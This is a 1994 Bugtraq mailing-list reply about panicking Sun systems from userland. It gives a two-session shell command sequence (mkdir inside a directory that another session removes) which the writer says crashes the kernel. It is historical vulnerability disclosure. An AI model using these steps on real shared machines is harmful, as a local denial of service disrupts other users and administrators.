[164] in bugtraq
Re: udp packet storms - ping death
daemon@ATHENA.MIT.EDU (Charles Howes)
Fri Nov 4 03:15:16 1994
Date: Thu, 3 Nov 1994 22:53:49 -0800 (PST)
From: Charles Howes <chowes@helix.net>
To: "Perry E. Metzger" <perry@imsi.com>
Cc: bugtraq@fc.net
In-Reply-To: <9411021904.AA07880@snark.imsi.com>
On Wed, 2 Nov 1994, Perry E. Metzger wrote:
> Charles Howes says:
> > > Our copy of ping is installed setuid root; ...
> >
> > So you mean that any student at princeton can panic any Sun there just by
> > typing that command? Cool...
>
> There are already so many ways to panic suns from userland...
Yes, I've found one that's rather easy:
Sign on twice. Transcript one:
cd /tmp
mkdir foo
cd foo
(*)
mkdir bar
Transcript two: (Executed at '*' in transcript one)
cd /tmp
rmdir foo
I don't think you can remove the 'mkdir' part of the kernel without
causing some major problems.
--
Charles Howes -- chowes@helix.net
Always tell the truth, then you make it the other bloke's problem!
- Sean Connery, 1971
